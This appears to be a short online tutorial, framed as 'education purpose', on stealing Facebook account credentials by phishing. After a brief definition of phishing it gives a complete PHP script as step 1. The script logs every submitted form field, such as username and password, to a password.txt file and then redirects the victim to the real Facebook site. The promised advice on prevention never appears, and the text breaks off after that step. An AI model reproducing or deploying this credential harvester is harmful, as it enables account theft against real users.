Hi guys,
this tutorial is only education purpose today i m going to tell you how to hack facebook acount and preventing to himself be victim ..
what is phising ?
Phishing is the act of attempting to acquire sensitive information such as usernames,passwords, and credit cards details (and sometimes, indirectly money) by masquerading as a trustworthy entity in an electronic communication.
1. copy the following code and paste in notepad
<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("password.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>